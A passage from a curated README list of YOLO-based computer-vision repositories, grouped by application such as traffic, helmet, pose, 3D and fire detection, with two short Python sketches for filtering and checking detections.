- [DickensKP/yolov3-vehicle-pedestrian-trafficsign-detection-system](https://github.com/DickensKP/yolov3-vehicle-pedestrian-trafficsign-detection-system) <img src="https://img.shields.io/github/stars/DickensKP/yolov3-vehicle-pedestrian-trafficsign-detection-system?style=social"/> : A self-trained vehicle, pedestrian and traffic sign recognition system based on bubbliiiing's yolov3-pytorch framework.
- [mkrupczak3/Coneslayer](https://github.com/mkrupczak3/Coneslayer) <img src="https://img.shields.io/github/stars/mkrupczak3/Coneslayer?style=social"/> : A lightweight neural network for rapid detection of traffic cones.
- #### Crosswalk Detection
##### ไบบ่กŒๆจช้“/ๆ–‘้ฉฌ็บฟๆฃ€ๆต‹
- [CDNet](https://github.com/zhangzhengde0225/CDNet) <img src="https://img.shields.io/github/stars/zhangzhengde0225/CDNet?style=social"/> : "CDNet: a real-time and robust crosswalk detection network on Jetson nano based on YOLOv5". (**[Neural Computing and Applications 2022](https://link.springer.com/article/10.1007/s00521-022-07007-9)**). "ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒCVerใ€ใ€Š[ไธŠๆตทไบคๅคงๆๅ‡บCDNet๏ผšๅŸบไบŽๆ”น่ฟ›YOLOv5็š„ๆ–‘้ฉฌ็บฟๅ’Œๆฑฝ่ฝฆ่ฟ‡็บฟ่กŒไธบๆฃ€ๆต‹](https://mp.weixin.qq.com/s/2F3WBtfN_7DkhERMOH8-QA)ใ€‹"ใ€‚
- [xN1ckuz/Crosswalks-Detection-using-YoloV5](https://github.com/xN1ckuz/Crosswalks-Detection-using-YoloV5) <img src="https://img.shields.io/github/stars/xN1ckuz/Crosswalks-Detection-using-YoloV5?style=social"/> : Crosswalk detection using YOLO, a project for the Computer Vision and Machine Perception course at the University of Basilicata, Computer Science and Engineering.
- #### Traffic Accidents Detection
##### ไบค้€šไบ‹ๆ•…ๆฃ€ๆต‹
- [khaledsabry97/Argus](https://github.com/khaledsabry97/Argus) <img src="https://img.shields.io/github/stars/khaledsabry97/Argus?style=social"/> : "Road Traffic Accidents Detection Based On Crash Estimation". (**[IEEE ICENCO 2021](https://ieeexplore.ieee.org/document/9698968)**)
- #### Road Damage Detection
##### ้“่ทฏๆŸไผคๆฃ€ๆต‹
- [adnanmushtaq1996/Yolov4_Road_Damage_Detection](https://github.com/adnanmushtaq1996/Yolov4_Road_Damage_Detection) <img src="https://img.shields.io/github/stars/adnanmushtaq1996/Yolov4_Road_Damage_Detection?style=social"/> : A repository to train a custom YOLOv4-based object detector for road damage detection using the RDD2020 dataset.
- [E-Kozyreva/detection_potholes_yolov8n](https://github.com/E-Kozyreva/detection_potholes_yolov8n) <img src="https://img.shields.io/github/stars/E-Kozyreva/detection_potholes_yolov8n?style=social"/> : Detecting potholes on roads with YOLOv8 Nano.
- ### Animal Detection
#### ๅŠจ็‰ฉๆฃ€ๆต‹
- [SaiSwarup27/Animal-Intrusion-Detection](https://github.com/SaiSwarup27/Animal-Intrusion-Detection) <img src="https://img.shields.io/github/stars/SaiSwarup27/Animal-Intrusion-Detection?style=social"/> : Animal Detection using YOLOv5.
- [xcapt0/animal_recognition](https://github.com/xcapt0/animal_recognition) <img src="https://img.shields.io/github/stars/xcapt0/animal_recognition?style=social"/> : ๐Ÿฆ Let the robot recognize the animal instead of you | YOLOv5.
- [PhamDangNguyen/YOLOv5_Animals](https://github.com/PhamDangNguyen/YOLOv5_Animals) <img src="https://img.shields.io/github/stars/PhamDangNguyen/YOLOv5_Animals?style=social"/> : YOLOv5 for animal detection.
- [Sabuj-CSE11/AnimalDetection](https://github.com/Sabuj-CSE11/AnimalDetection) <img src="https://img.shields.io/github/stars/Sabuj-CSE11/AnimalDetection?style=social"/> : Cat and dog detection using YOLOv5.
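Several of the animal-detection projects above simply run a stock COCO-trained YOLOv5 and keep only the animal classes. A minimal sketch of that filtering, assuming the `torch.hub` entry point of ultralytics/yolov5 (the class names below are standard COCO labels; `farm.jpg` is a hypothetical input):

```python
# Filter a COCO-trained YOLOv5 down to its animal classes only.
import torch

ANIMALS = {"bird", "cat", "dog", "horse", "sheep", "cow",
           "elephant", "bear", "zebra", "giraffe"}  # COCO animal labels

model = torch.hub.load("ultralytics/yolov5", "yolov5s", pretrained=True)
results = model("farm.jpg")                 # hypothetical input image
df = results.pandas().xyxy[0]               # one DataFrame per image
print(df[df["name"].isin(ANIMALS)][["name", "confidence"]])
```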
- ### Helmet Detection
#### ๅคด็›”/ๅฎ‰ๅ…จๅธฝๆฃ€ๆต‹
- [PeterH0323/Smart_Construction](https://github.com/PeterH0323/Smart_Construction) <img src="https://img.shields.io/github/stars/PeterH0323/Smart_Construction?style=social"/> : Head, person and helmet detection on construction sites; an object-detection-based system for recognizing safety helmets and entry into danger zones.
- [Byronnar/tensorflow-serving-yolov3](https://github.com/Byronnar/tensorflow-serving-yolov3) <img src="https://img.shields.io/github/stars/Byronnar/tensorflow-serving-yolov3?style=social"/> : Many detail-level improvements over the original tensorflow-yolov3, with TensorFlow Serving deployment added; trained on several datasets, including VisDrone2019 and safety helmets.
- [gengyanlei/reflective-clothes-detect-yolov5](https://github.com/gengyanlei/reflective-clothes-detect-yolov5) <img src="https://img.shields.io/github/stars/gengyanlei/reflective-clothes-detect-yolov5?style=social"/> : reflective-clothes-detect-dataset and helmet detection with YOLOv5; a workwear (reflective vest) detection dataset, safety helmet detection, and construction-worker PPE detection.
- [DataXujing/YOLO-V3-Tensorflow](https://github.com/DataXujing/YOLO-V3-Tensorflow) <img src="https://img.shields.io/github/stars/DataXujing/YOLO-V3-Tensorflow?style=social"/> : ๐Ÿ‘ท ๐Ÿ‘ท๐Ÿ‘ท YOLO V3 (TensorFlow 1.x) safety helmet recognition | dataset download and pre-trained model provided.
- [rafiuddinkhan/Yolo-Training-GoogleColab](https://github.com/rafiuddinkhan/Yolo-Training-GoogleColab) <img src="https://img.shields.io/github/stars/rafiuddinkhan/Yolo-Training-GoogleColab?style=social"/> : Helmet detection with tiny-YOLO-v3, trained on your own dataset and tested in Google Colaboratory.
- [BlcaKHat/yolov3-Helmet-Detection](https://github.com/BlcaKHat/yolov3-Helmet-Detection) <img src="https://img.shields.io/github/stars/BlcaKHat/yolov3-Helmet-Detection?style=social"/> : Training a YOLOv3 model to detect the presence of helmets for intrusion or traffic monitoring.
- [yumulinfeng1/YOLOv4-Hat-detection](https://github.com/yumulinfeng1/YOLOv4-Hat-detection) <img src="https://img.shields.io/github/stars/yumulinfeng1/YOLOv4-Hat-detection?style=social"/> : Safety-helmet wearing detection based on YOLOv4.
- [FanDady/Helmet-Detection-YoloV5](https://github.com/FanDady/Helmet-Detection-YoloV5) <img src="https://img.shields.io/github/stars/FanDady/Helmet-Detection-YoloV5?style=social"/> : Safety helmet wearing detection on construction sites based on YOLOv5s-V5.0, including an open helmet dataset.
- [RUI-LIU7/Helmet_Detection](https://github.com/RUI-LIU7/Helmet_Detection) <img src="https://img.shields.io/github/stars/RUI-LIU7/Helmet_Detection?style=social"/> : Uses the YOLOv5 algorithm to monitor safety helmets and danger zones, with Hikvision camera integration for real-time monitoring.
- [ZijianWang1995/PPE_detection](https://github.com/ZijianWang1995/PPE_detection) <img src="https://img.shields.io/github/stars/ZijianWang1995/PPE_detection?style=social"/> : Real-time PPE detection based on YOLO. Open high-quality dataset. "Fast Personal Protective Equipment Detection for Real Construction Sites Using Deep Learning Approaches". (**[Sensors 2021](https://www.mdpi.com/1424-8220/21/10/3478)**)

(A minimal helmet-compliance check built on detectors like these is sketched after the Hand Detection list below.)
- ### Hand Detection
#### ๆ‰‹้ƒจๆฃ€ๆต‹
- [cansik/yolo-hand-detection](https://github.com/cansik/yolo-hand-detection) <img src="https://img.shields.io/github/stars/cansik/yolo-hand-detection?style=social"/> : A pre-trained YOLO based hand detection network.
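The construction-safety repos above typically reduce "is this worker wearing a helmet?" to a box-overlap test between person and helmet detections. A minimal sketch of that rule, where `helmet.pt`, the `person`/`helmet` class names, and the top-fifth head heuristic are all assumptions, not any specific repo's method:

```python
# Flag persons whose head region contains no helmet detection.
import torch

def overlaps(a, b):
    """True if boxes a and b, given as (x1, y1, x2, y2), intersect."""
    return a[0] < b[2] and b[0] < a[2] and a[1] < b[3] and b[1] < a[3]

model = torch.hub.load("ultralytics/yolov5", "custom", path="helmet.pt")
df = model("site.jpg").pandas().xyxy[0]      # detections as a DataFrame
persons = df[df["name"] == "person"]
helmets = df[df["name"] == "helmet"]

for _, p in persons.iterrows():
    # Rough heuristic: only the top fifth of the person box, where the head sits.
    head = (p.xmin, p.ymin, p.xmax, p.ymin + 0.2 * (p.ymax - p.ymin))
    ok = any(overlaps(head, (h.xmin, h.ymin, h.xmax, h.ymax))
             for _, h in helmets.iterrows())
    if not ok:
        print(f"no helmet at ({p.xmin:.0f}, {p.ymin:.0f})")
```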
- ### Gesture Recognition
#### ๆ‰‹ๅŠฟ/ๆ‰‹่ฏญ่ฏ†ๅˆซ
- [MahmudulAlam/Unified-Gesture-and-Fingertip-Detection](https://github.com/MahmudulAlam/Unified-Gesture-and-Fingertip-Detection) <img src="https://img.shields.io/github/stars/MahmudulAlam/Unified-Gesture-and-Fingertip-Detection?style=social"/> : "Unified learning approach for egocentric hand gesture recognition and fingertip detection". (**[Elsevier 2022](https://www.sciencedirect.com/science/article/abs/pii/S0031320321003824)**)
- [insigh1/Interactive_ABCs_with_American_Sign_Language_using_Yolov5](https://github.com/insigh1/Interactive_ABCs_with_American_Sign_Language_using_Yolov5) <img src="https://img.shields.io/github/stars/insigh1/Interactive_ABCs_with_American_Sign_Language_using_Yolov5?style=social"/> : Interactive ABC's with American Sign Language.
- [Dreaming-future/YOLO-Object-Detection](https://github.com/Dreaming-future/YOLO-Object-Detection) <img src="https://img.shields.io/github/stars/Dreaming-future/YOLO-Object-Detection?style=social"/> : YOLO-Object-Detection integrates multiple YOLO models as a template for object detection.
- ### Action Detection
#### ่กŒไธบๆฃ€ๆต‹
- [wufan-tb/yolo_slowfast](https://github.com/wufan-tb/yolo_slowfast) <img src="https://img.shields.io/github/stars/wufan-tb/yolo_slowfast?style=social"/> : A real-time action detection framework based on PyTorchVideo.
- ### Emotion Recognition
#### ๆƒ…ๆ„Ÿ่ฏ†ๅˆซ
- [Tandon-A/emotic](https://github.com/Tandon-A/emotic) <img src="https://img.shields.io/github/stars/Tandon-A/emotic?style=social"/> : "Context based emotion recognition using emotic dataset". (**[arXiv 2020](https://arxiv.org/abs/2003.13401)**)
- ### Human Pose Estimation
#### ไบบไฝ“ๅงฟๆ€ไผฐ่ฎก
- [wmcnally/kapao](https://github.com/wmcnally/kapao) <img src="https://img.shields.io/github/stars/wmcnally/kapao?style=social"/> : KAPAO is a state-of-the-art single-stage human pose estimation model that detects keypoints and poses as objects and fuses the detections to predict human poses. "Rethinking Keypoint Representations: Modeling Keypoints and Poses as Objects for Multi-Person Human Pose Estimation". (**[arXiv 2021](https://arxiv.org/abs/2111.08557)**)
- [TexasInstruments/edgeai-yolov5](https://github.com/TexasInstruments/edgeai-yolov5) <img src="https://img.shields.io/github/stars/TexasInstruments/edgeai-yolov5?style=social"/> : "YOLO-Pose: Enhancing YOLO for Multi Person Pose Estimation Using Object Keypoint Similarity Loss". (**[arXiv 2022](https://arxiv.org/abs/2204.06806)**)
- [TexasInstruments/edgeai-yolox](https://github.com/TexasInstruments/edgeai-yolox) <img src="https://img.shields.io/github/stars/TexasInstruments/edgeai-yolox?style=social"/> : "YOLO-Pose: Enhancing YOLO for Multi Person Pose Estimation Using Object Keypoint Similarity Loss". (**[arXiv 2022](https://arxiv.org/abs/2204.06806)**)
- [jinfagang/VIBE_yolov5](https://github.com/jinfagang/VIBE_yolov5) <img src="https://img.shields.io/github/stars/jinfagang/VIBE_yolov5?style=social"/> : Using YOLOv5 as the detector in VIBE. "VIBE: Video Inference for Human Body Pose and Shape Estimation". (**[CVPR 2020](https://openaccess.thecvf.com/content_CVPR_2020/html/Kocabas_VIBE_Video_Inference_for_Human_Body_Pose_and_Shape_Estimation_CVPR_2020_paper.html)**)
- [zhuoxiangpang/ism_person_openpose](https://github.com/zhuoxiangpang/ism_person_openpose) <img src="https://img.shields.io/github/stars/zhuoxiangpang/ism_person_openpose?style=social"/> : YOLOv5 person detection + OpenPose pose estimation for fall detection.
- [pengyang1225/yolov5_person_pose](https://github.com/pengyang1225/yolov5_person_pose) <img src="https://img.shields.io/github/stars/pengyang1225/yolov5_person_pose?style=social"/> : YOLOv5-based person pose estimation.
- [hpc203/yolov5_pose_opencv](https://github.com/hpc203/yolov5_pose_opencv) <img src="https://img.shields.io/github/stars/hpc203/yolov5_pose_opencv?style=social"/> : Deploys yolov5-pose object detection + human pose estimation with OpenCV, with both C++ and Python programs; supports yolov5s, yolov5m and yolov5l.
- [RizwanMunawar/yolov7-pose-estimation](https://github.com/RizwanMunawar/yolov7-pose-estimation) <img src="https://img.shields.io/github/stars/RizwanMunawar/yolov7-pose-estimation?style=social"/> : YOLOv7 pose estimation using OpenCV, PyTorch.
- [nanmi/yolov7-pose](https://github.com/nanmi/yolov7-pose) <img src="https://img.shields.io/github/stars/nanmi/yolov7-pose?style=social"/> : Pose detection based on YOLOv7.
- ### Distance Measurement
#### ่ท็ฆปๆต‹้‡
- [davidfrz/yolov5_distance_count](https://github.com/davidfrz/yolov5_distance_count) <img src="https://img.shields.io/github/stars/davidfrz/yolov5_distance_count?style=social"/> : Object detection with YOLOv5 plus distance measurement with a binocular (stereo) camera.
- [wenyishengkingkong/realsense-D455-YOLOV5](https://github.com/wenyishengkingkong/realsense-D455-YOLOV5) <img src="https://img.shields.io/github/stars/wenyishengkingkong/realsense-D455-YOLOV5?style=social"/> : Uses a RealSense depth camera to measure distance while running YOLOv5 object detection.
- [Thinkin99/yolov5_d435i_detection](https://github.com/Thinkin99/yolov5_d435i_detection) <img src="https://img.shields.io/github/stars/Thinkin99/yolov5_d435i_detection?style=social"/> : YOLOv5 object detection in PyTorch with a RealSense D435i camera, returning the positions of detected targets in the camera coordinate frame.
- [MUCHWAY/detect_distance_gazebo](https://github.com/MUCHWAY/detect_distance_gazebo) <img src="https://img.shields.io/github/stars/MUCHWAY/detect_distance_gazebo?style=social"/> : yolov5+camera_distance+gazebo.
- [magisystem0408/yolov5-DeepSort-RealSenseD435i](https://github.com/magisystem0408/yolov5-DeepSort-RealSenseD435i) <img src="https://img.shields.io/github/stars/magisystem0408/yolov5-DeepSort-RealSenseD435i?style=social"/> : YOLOv5 + DeepSort + RealSense D435i.
- ### Instance and Semantic Segmentation
#### ๅฎžไพ‹ๅ’Œ่ฏญไน‰ๅˆ†ๅ‰ฒ
- [SAM](https://github.com/facebookresearch/segment-anything) <img src="https://img.shields.io/github/stars/facebookresearch/segment-anything?style=social"/> : The repository provides code for running inference with the SegmentAnything Model (SAM), links for downloading the trained model checkpoints, and example notebooks that show how to use the model. "Segment Anything". (**[arXiv 2023](https://arxiv.org/abs/2304.02643)**).
- [Grounded-SAM](https://github.com/IDEA-Research/Grounded-Segment-Anything) <img src="https://img.shields.io/github/stars/IDEA-Research/Grounded-Segment-Anything?style=social"/> : Marrying Grounding DINO with Segment Anything & Stable Diffusion & Tag2Text & BLIP & Whisper & ChatBot - Automatically Detect, Segment and Generate Anything with Image, Text, and Audio Inputs. We plan to create a very interesting demo by combining [Grounding DINO](https://github.com/IDEA-Research/GroundingDINO) and [Segment Anything](https://github.com/facebookresearch/segment-anything), which aims to detect and segment anything with text inputs!
- [Laughing-q/yolov5-q](https://github.com/Laughing-q/yolov5-q) <img src="https://img.shields.io/github/stars/Laughing-q/yolov5-q?style=social"/> : Instance segmentation based on yolov5-6.0 and YOLACT.
- [TomMao23/multiyolov5](https://github.com/TomMao23/multiyolov5) <img src="https://img.shields.io/github/stars/TomMao23/multiyolov5?style=social"/> : Multi YOLO V5: detection and semantic segmentation.
- [ArtyZe/yolo_segmentation](https://github.com/ArtyZe/yolo_segmentation) <img src="https://img.shields.io/github/stars/ArtyZe/yolo_segmentation?style=social"/> : Image semantic and instance segmentation with darknet or YOLO.
- [midasklr/yolov5ds](https://github.com/midasklr/yolov5ds) <img src="https://img.shields.io/github/stars/midasklr/yolov5ds?style=social"/> : Multi-task YOLOv5 with detection and segmentation.
- [RizwanMunawar/yolov7-segmentation](https://github.com/RizwanMunawar/yolov7-segmentation) <img src="https://img.shields.io/github/stars/RizwanMunawar/yolov7-segmentation?style=social"/> : YOLOv7 instance segmentation using OpenCV and PyTorch.
- [leandro-svg/Yolov7_Segmentation_Tensorrt](https://github.com/leandro-svg/Yolov7_Segmentation_Tensorrt) <img src="https://img.shields.io/github/stars/leandro-svg/Yolov7_Segmentation_Tensorrt?style=social"/> : The real-time instance segmentation algorithm YOLOv7 running on TensorRT and ONNX.
- [akashAD98/YOLOV8_SAM](https://github.com/akashAD98/YOLOV8_SAM) <img src="https://img.shields.io/github/stars/akashAD98/YOLOV8_SAM?style=social"/> : Use YOLOv8 & the SAM model to get segmentation masks for a custom model.
- ### 3D Object Detection
#### ไธ‰็ปด็›ฎๆ ‡ๆฃ€ๆต‹
- [ADLab-AutoDrive/BEVFusion](https://github.com/ADLab-AutoDrive/BEVFusion) <img src="https://img.shields.io/github/stars/ADLab-AutoDrive/BEVFusion?style=social"/> : "BEVFusion: A Simple and Robust LiDAR-Camera Fusion Framework". (**[NeurIPS 2022](https://arxiv.org/abs/2205.13790)**).
- [mit-han-lab/bevfusion](https://github.com/mit-han-lab/bevfusion) <img src="https://img.shields.io/github/stars/mit-han-lab/bevfusion?style=social"/> : "BEVFusion: Multi-Task Multi-Sensor Fusion with Unified Bird's-Eye View Representation". (**[ICRA 2023](https://arxiv.org/abs/2205.13542)**).
- [SAM3D](https://github.com/DYZhang09/SAM3D) <img src="https://img.shields.io/github/stars/DYZhang09/SAM3D?style=social"/> : "SAM3D: Zero-Shot 3D Object Detection via [Segment Anything](https://github.com/facebookresearch/segment-anything) Model". (**[arXiv 2023](https://arxiv.org/abs/2306.02245)**).
- [maudzung/YOLO3D-YOLOv4-PyTorch](https://github.com/maudzung/YOLO3D-YOLOv4-PyTorch) <img src="https://img.shields.io/github/stars/maudzung/YOLO3D-YOLOv4-PyTorch?style=social"/> : The PyTorch implementation based on YOLOv4 of the paper: "YOLO3D: End-to-end real-time 3D Oriented Object Bounding Box Detection from LiDAR Point Cloud". (**[ECCV 2018](https://openaccess.thecvf.com/content_eccv_2018_workshops/w18/html/Ali_YOLO3D_End-to-end_real-time_3D_Oriented_Object_Bounding_Box_Detection_from_ECCVW_2018_paper.html)**)
- [maudzung/Complex-YOLOv4-Pytorch](https://github.com/maudzung/Complex-YOLOv4-Pytorch) <img src="https://img.shields.io/github/stars/maudzung/Complex-YOLOv4-Pytorch?style=social"/> : The PyTorch implementation based on YOLOv4 of the paper: "Complex-YOLO: Real-time 3D Object Detection on Point Clouds". (**[arXiv 2018](https://arxiv.org/abs/1803.06199)**)
- [AI-liu/Complex-YOLO](https://github.com/AI-liu/Complex-YOLO) <img src="https://img.shields.io/github/stars/AI-liu/Complex-YOLO?style=social"/> : An unofficial PyTorch implementation of "Complex-YOLO: Real-time 3D Object Detection on Point Clouds". (**[arXiv 2018](https://arxiv.org/abs/1803.06199)**)
- [ghimiredhikura/Complex-YOLOv3](https://github.com/ghimiredhikura/Complex-YOLOv3) <img src="https://img.shields.io/github/stars/ghimiredhikura/Complex-YOLOv3?style=social"/> : Complete but unofficial PyTorch implementation of "Complex-YOLO: Real-time 3D Object Detection on Point Clouds with YoloV3". (**[arXiv 2018](https://arxiv.org/abs/1803.06199)**)
- [ruhyadi/YOLO3D](https://github.com/ruhyadi/YOLO3D) <img src="https://img.shields.io/github/stars/ruhyadi/YOLO3D?style=social"/> : YOLO 3D object detection for autonomous driving vehicles. Based on [skhadem/3D-BoundingBox](https://github.com/skhadem/3D-BoundingBox), "3D Bounding Box Estimation Using Deep Learning and Geometry". (**[CVPR 2017](https://openaccess.thecvf.com/content_cvpr_2017/html/Mousavian_3D_Bounding_Box_CVPR_2017_paper.html)**)
- [ruhyadi/yolo3d-lightning](https://github.com/ruhyadi/yolo3d-lightning) <img src="https://img.shields.io/github/stars/ruhyadi/yolo3d-lightning?style=social"/> : YOLO for 3D object detection.
- [Yuanchu/YOLO3D](https://github.com/Yuanchu/YOLO3D) <img src="https://img.shields.io/github/stars/Yuanchu/YOLO3D?style=social"/> : Implementation of a basic YOLO model for object detection in 3D.
- [EmiyaNing/3D-YOLO](https://github.com/EmiyaNing/3D-YOLO) <img src="https://img.shields.io/github/stars/EmiyaNing/3D-YOLO?style=social"/> : YOLOv5 for LiDAR-based 3D BEV detection.
- ### SLAM Field Detection
#### SLAM้ข†ๅŸŸๆฃ€ๆต‹
- [bijustin/YOLO-DynaSLAM](https://github.com/bijustin/YOLO-DynaSLAM) <img src="https://img.shields.io/github/stars/bijustin/YOLO-DynaSLAM?style=social"/> : YOLO Dynamic ORB_SLAM is a visual SLAM system that is robust in dynamic scenarios for RGB-D configuration.
- [BzdTaisa/YoloPlanarSLAM](https://github.com/BzdTaisa/YoloPlanarSLAM) <img src="https://img.shields.io/github/stars/BzdTaisa/YoloPlanarSLAM?style=social"/> : YOLO-Planar-SLAM.
- [saransapmaz/cv-slam-object-determination](https://github.com/saransapmaz/cv-slam-object-determination) <img src="https://img.shields.io/github/stars/saransapmaz/cv-slam-object-determination?style=social"/> : Object detection with Hector SLAM and the YOLOv3 computer vision algorithm.
- ### Industrial Defect Detection
#### ๅทฅไธš็ผบ้™ทๆฃ€ๆต‹
- [annsonic/Steel_defect](https://github.com/annsonic/Steel_defect) <img src="https://img.shields.io/github/stars/annsonic/Steel_defect?style=social"/> : Exercise: use YOLO to detect hot-rolled steel strip surface defects (NEU-DET dataset).
- [VanillaHours/pcbDefectDetectionYOLO](https://github.com/VanillaHours/pcbDefectDetectionYOLO) <img src="https://img.shields.io/github/stars/VanillaHours/pcbDefectDetectionYOLO?style=social"/> : PCB defect detection using YOLOv3 on the DeepPCB dataset.
- [talisma-cassoma/pcb-components-detection-recognition](https://github.com/talisma-cassoma/pcb-components-detection-recognition) <img src="https://img.shields.io/github/stars/talisma-cassoma/pcb-components-detection-recognition?style=social"/> : Training and testing of a YOLOv5 convolutional neural network for detecting electronic components.
- [Luckycat518/Yolo-MSAPF](https://github.com/Luckycat518/Yolo-MSAPF) <img src="https://img.shields.io/github/stars/Luckycat518/Yolo-MSAPF?style=social"/> : Yolo-MSAPF: Multi-Scale Alignment Fusion with Parallel Feature Filtering model for high-accuracy weld defect detection.
- [JiaLim98/YOLO-PCB](https://github.com/JiaLim98/YOLO-PCB) <img src="https://img.shields.io/github/stars/JiaLim98/YOLO-PCB?style=social"/> : A Deep Context Learning based PCB Defect Detection Model with Anomalous Trend Alarming System.
- ### SAR Image Detection
#### ๅˆๆˆๅญ”ๅพ„้›ท่พพๅ›พๅƒๆฃ€ๆต‹
- [humblecoder612/SAR_yolov3](https://github.com/humblecoder612/SAR_yolov3) <img src="https://img.shields.io/github/stars/humblecoder612/SAR_yolov3?style=social"/> : SAR ship detection with a best-in-class accuracy-to-speed ratio.
- ### Multispectral Image Fusion Detection
#### ๅคšๅ…‰่ฐฑๅ›พๅƒ่žๅˆๆฃ€ๆต‹
- [NVIDIA-AI-IOT/Lidar_AI_Solution](https://github.com/NVIDIA-AI-IOT/Lidar_AI_Solution) <img src="https://img.shields.io/github/stars/NVIDIA-AI-IOT/Lidar_AI_Solution?style=social"/> : A highly optimized solution for the self-driving 3D-lidar repository. It does a great job of speeding up sparse convolution/CenterPoint/BEVFusion/OSD/conversion. A project demonstrating lidar-related AI solutions, including three GPU-accelerated lidar/camera DL networks (PointPillars, CenterPoint, BEVFusion) and the related libs (cuPCL, 3D SparseConvolution, YUV2RGB, cuOSD).
- [SuperYOLO](https://github.com/icey-zhang/SuperYOLO) <img src="https://img.shields.io/github/stars/icey-zhang/SuperYOLO?style=social"/> : "SuperYOLO: Super Resolution Assisted Object Detection in Multimodal Remote Sensing Imagery". (**[arXiv 2022](https://arxiv.org/abs/2209.13351)**)
- [OrangeSodahub/CRLFnet](https://github.com/OrangeSodahub/CRLFnet) <img src="https://img.shields.io/github/stars/OrangeSodahub/CRLFnet?style=social"/> : Camera-Radar-Lidar fusion detection net based on ROS, YOLOv3 and OpenPCDet integration.
- [mjoshi07/Visual-Sensor-Fusion](https://github.com/mjoshi07/Visual-Sensor-Fusion) <img src="https://img.shields.io/github/stars/mjoshi07/Visual-Sensor-Fusion?style=social"/> : LiDAR fusion with vision.
- [DocF/multispectral-object-detection](https://github.com/DocF/multispectral-object-detection) <img src="https://img.shields.io/github/stars/DocF/multispectral-object-detection?style=social"/> : Multispectral object detection with YOLOv5 and Transformer.
- [MAli-Farooq/Thermal-YOLO](https://github.com/MAli-Farooq/Thermal-YOLO) <img src="https://img.shields.io/github/stars/MAli-Farooq/Thermal-YOLO?style=social"/> : A study on object detection in the thermal infrared spectrum using the YOLOv5 framework for ADAS applications.
- [Ye-zixiao/Double-YOLO-Kaist](https://github.com/Ye-zixiao/Double-YOLO-Kaist) <img src="https://img.shields.io/github/stars/Ye-zixiao/Double-YOLO-Kaist?style=social"/> : A dual-stream mixed-modality road pedestrian detection method based on YOLOv3/v4 ๐ŸŒŠ๐Ÿ’ง๐Ÿ’ฆ.
- [eralso/yolov5_Visible_Infrared_Vehicle_Detection](https://github.com/eralso/yolov5_Visible_Infrared_Vehicle_Detection) <img src="https://img.shields.io/github/stars/eralso/yolov5_Visible_Infrared_Vehicle_Detection?style=social"/> : Deep learning vehicle detection based on visible and infrared images.
- [Arrowes/CEAM-YOLOv7](https://github.com/Arrowes/CEAM-YOLOv7) <img src="https://img.shields.io/github/stars/Arrowes/CEAM-YOLOv7?style=social"/> : CEAM-YOLOv7: Improved YOLOv7 Based on Channel Expansion and Attention Mechanism for Driver Distraction Behavior Detection.
- [jere357/yolov5-RGBD](https://github.com/jere357/yolov5-RGBD) <img src="https://img.shields.io/github/stars/jere357/yolov5-RGBD?style=social"/> : A "fork" of yolov5 that can run inference on RGBD(C) images; still messy code and a work in progress (not a GitHub fork, because the author already has one fork with a PR pending).
- ### Safety Monitoring Field Detection
#### ๅฎ‰้˜ฒ็›‘ๆŽง้ข†ๅŸŸๆฃ€ๆต‹
- [gengyanlei/fire-smoke-detect-yolov4](https://github.com/gengyanlei/fire-smoke-detect-yolov4) <img src="https://img.shields.io/github/stars/gengyanlei/fire-smoke-detect-yolov4?style=social"/> : fire-smoke-detect-yolov4-yolov5 and a fire-smoke-detection dataset; fire and smoke detection.
- [CVUsers/Smoke-Detect-by-YoloV5](https://github.com/CVUsers/Smoke-Detect-by-YoloV5) <img src="https://img.shields.io/github/stars/CVUsers/Smoke-Detect-by-YoloV5?style=social"/> : YOLOv5 real-time smoke detection system.
- [CVUsers/Fire-Detect-by-YoloV5](https://github.com/CVUsers/Fire-Detect-by-YoloV5) <img src="https://img.shields.io/github/stars/CVUsers/Fire-Detect-by-YoloV5?style=social"/> : Fire, dense smoke, and smoking detection.
- [spacewalk01/Yolov5-Fire-Detection](https://github.com/spacewalk01/Yolov5-Fire-Detection) <img src="https://img.shields.io/github/stars/spacewalk01/Yolov5-Fire-Detection?style=social"/> : Train YOLOv5 to detect fire in images or video.
- [roflcoopter/viseron](https://github.com/roflcoopter/viseron) <img src="https://img.shields.io/github/stars/roflcoopter/viseron?style=social"/> : Viseron - Self-hosted NVR with object detection.
- [dcmartin/motion-ai](https://github.com/dcmartin/motion-ai) <img src="https://img.shields.io/github/stars/dcmartin/motion-ai?style=social"/> : AI assisted motion detection for Home Assistant.
- [Nico31415/Drowning-Detector](https://github.com/Nico31415/Drowning-Detector) <img src="https://img.shields.io/github/stars/Nico31415/Drowning-Detector?style=social"/> : Using YOLO object detection, this program detects whether a person is drowning.
- [mc-cat-tty/DoorbellCamDaemon](https://github.com/mc-cat-tty/DoorbellCamDaemon) <img src="https://img.shields.io/github/stars/mc-cat-tty/DoorbellCamDaemon?style=social"/> : Part of the DoorbellCam project: a daemon for people recognition with YOLO from an RTSP video stream.
- [Choe-Ji-Hwan/Fire_Detect_Custom_Yolov5](https://github.com/Choe-Ji-Hwan/Fire_Detect_Custom_Yolov5) <img src="https://img.shields.io/github/stars/Choe-Ji-Hwan/Fire_Detect_Custom_Yolov5?style=social"/> : 2022-1 individual research assignment: using YOLOv5 to recognize each type of fire.
- [bishal116/FireDetection](https://github.com/bishal116/FireDetection) <img src="https://img.shields.io/github/stars/bishal116/FireDetection?style=social"/> : This project builds fire detection using the YOLOv3 model.
- [Psynosaur/Jetson-SecVision](https://github.com/Psynosaur/Jetson-SecVision) <img src="https://img.shields.io/github/stars/Psynosaur/Jetson-SecVision?style=social"/> : Person detection for Hikvision DVRs with AlarmIO ports, using TensorRT and YOLOv4.
- [robmarkcole/fire-detection-from-images](https://github.com/robmarkcole/fire-detection-from-images) <img src="https://img.shields.io/github/stars/robmarkcole/fire-detection-from-images?style=social"/> : Detect fire in images using neural nets.
- [gaiasd/DFireDataset](https://github.com/gaiasd/DFireDataset) <img src="https://img.shields.io/github/stars/gaiasd/DFireDataset?style=social"/> : D-Fire: an image dataset for fire and smoke detection.
- [MuhammadMoinFaisal/FireDetectionYOLOv8](https://github.com/MuhammadMoinFaisal/FireDetectionYOLOv8) <img src="https://img.shields.io/github/stars/MuhammadMoinFaisal/FireDetectionYOLOv8?style=social"/> : Fire Detection using YOLOv8.
- [AI-Expert-04/School_Zone_Eye_Level](https://github.com/AI-Expert-04/School_Zone_Eye_Level) <img src="https://img.shields.io/github/stars/AI-Expert-04/School_Zone_Eye_Level?style=social"/> : Prevention of accidents in school zones using deep learning.
